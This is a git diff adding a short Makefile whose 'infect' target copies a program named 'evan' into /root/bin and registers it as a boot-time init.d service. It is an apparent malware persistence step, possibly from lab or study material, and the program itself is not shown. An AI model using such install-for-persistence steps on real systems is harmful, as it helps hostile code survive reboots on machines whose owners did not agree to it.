diff options
Diffstat (limited to 'evan/Makefile')
-rw-r--r-- | evan/Makefile | 8 |
1 files changed, 8 insertions, 0 deletions
diff --git a/evan/Makefile b/evan/Makefile new file mode 100644 index 00000000..366e86ee --- /dev/null +++ b/evan/Makefile @@ -0,0 +1,8 @@ +.PHONY: infect +INSTALL_DIR = /root/bin +infect: + mkdir -p ${INSTALL_DIR} + cp evan ${INSTALL_DIR} + cp evan-startup /etc/init.d/evan + update-rc.d evan start + |